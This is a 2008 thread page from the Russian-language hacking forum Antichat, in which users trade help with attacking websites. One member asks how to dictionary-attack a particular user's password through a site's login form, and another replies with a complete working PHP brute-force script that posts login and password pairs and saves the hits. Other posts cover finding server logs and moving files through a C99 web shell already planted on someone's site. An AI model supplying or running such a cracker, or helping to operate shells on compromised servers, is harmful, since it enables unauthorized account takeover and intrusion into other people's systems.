ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3571  
Старый 08.11.2008, 14:43
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Есть отличные команды в никсах:
find и locate - вот и ищи логи.
А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.

Последний раз редактировалось $n@ke; 08.11.2008 в 14:49.. Причина: ошибочка
 
Ответить с цитированием

  #3572  
Старый 08.11.2008, 17:58
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Незнал где спросить, запостил сюда.

Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
 
Ответить с цитированием

  #3573  
Старый 08.11.2008, 18:44
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

2samarin

wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток

если не найдешь могу скинуть на почту
 
Ответить с цитированием

  #3574  
Старый 08.11.2008, 19:32
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

wwwhack с https не работает. Есть ли еще какие нибудь варианты?
 
Ответить с цитированием

  #3575  
Старый 08.11.2008, 19:54
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от samarin  
Незнал где спросить, запостил сюда.

Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?


PHP код:
<?################Брутфорс  Форм##################
///////////////////////----(c) nc.STRIEM----//////////////////////////
    
$filepas="file.txt" ///файл   с данными для брута
    
$filegood="good.txt"///файл с подходящими паролями
    
$endifg=1///закончить при первом же найденом 1-да 0-нет
    
    
$iskl=array();
//////строки которых не  должно быть в правельных страницах/////////
     
$iskl[0]="Неверный пароль";
    
//$iskl[1]="Неверная длина пароля!";
    //$iskl[2]="ERROR";
    //$iskl[3]="Ошибка";
    
//////////////////////////////////////////////////////////////////
    
$host="localhost";  ///хост
    
$script="/form.php";     ///скрипт 
                                    
///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////    
    
$header="POST http://$host$script HTTP/1.0\r\n";
    
$header.= "Host: $host\r\n";
    
$header.= "Content-Type: application/x-www-form-urlencoded\r\n";
//////Не обязательные параметры! но не всегда///
    //$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
    //$header.="Accept-Language: ru\r\n";
    //$header.= "Proxy-Connection: Keep-Alive\r\n";
    //$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
    //$header.="Referer:  http://microsoft.com\r\n";
    //$header.="Cookie: CREATED=nc.STRIEM\r\n";
####################################Сам брут#####################################    
    
set_time_limit(0);
    
$fo=fopen($filepas,"r");
    
$kolvoporolei=0;
    
$timestart=time('U');
    
$fgo=fopen($filegood,"a");
    echo 
"<h3><center>Мы брутили http://$host$script</center></h3>";
 while(!
feof($fo))
 {
/////////////////////////////////////////////
$fp fsockopen("www.".$host80$errno$errstr30);
if (!
$fp
    echo 
"$errstr ($errno)<br />\n";
 else 
 {
  
$kolvoporolei++;
   
$dan=rtrim(fgets($fo));  /////берем данные из файла
    
$dannii=split(';',$dan);
    
    
$out=$header;
    
$zapr="login=$dannii[0]&password=$dannii[1]";     ////имена переменных и их значения сюда
    
$contleng=strlen($zapr);
    
$out.= "Content-Length: $contleng\r\n";
    
$out.= "Pragma: no-cache\r\n\r\n";
    
$out.= "$zapr\r\n\r\n";

     
fwrite($fp$out);
    
$conte="";
 while (!
feof($fp)) 
   
$conte.=fgets($fp);
   
  
$est=1;
for(
$i=0;$i<sizeof($iskl);$i++)
   if(
strstr($conte$iskl[$i]))
     {
     
$est=0;
     break;
     }
/////может понадобиться при настройки///
//echo htmlspecialchars($conte); break;
/////////////////////////////////
if($est)
   {
   
fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
   echo 
"<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
   if(
$endifg)
      break;
    }
     
fclose($fp);
  }
}
//////////////////////////////////////////////////////////////////////////////////////////
fclose($fgo);
$time=time('U')-$timestart;
echo 
"<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>nc.striem@mail.ru</tt></center></h4>";
?>
 
Ответить с цитированием

  #3576  
Старый 08.11.2008, 20:50
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

как раскрыть пути в Zeus Web Server? ))
 
Ответить с цитированием

  #3577  
Старый 09.11.2008, 02:35
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Всем здрасти....
Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
 
Ответить с цитированием

  #3578  
Старый 09.11.2008, 02:58
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Только под своим ипом обязательно!!!!)
Какой шелл?
 
Ответить с цитированием

  #3579  
Старый 09.11.2008, 03:03
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

С99 madnet edition

штоле
 
Ответить с цитированием

  #3580  
Старый 09.11.2008, 03:07
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

diznt
А ты уверен что под маздаем сидишь? Может ты под FreeBSD, и пытаешься выполнить виндовые команды ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
 


Быстрый переход




ANTICHAT.XYZ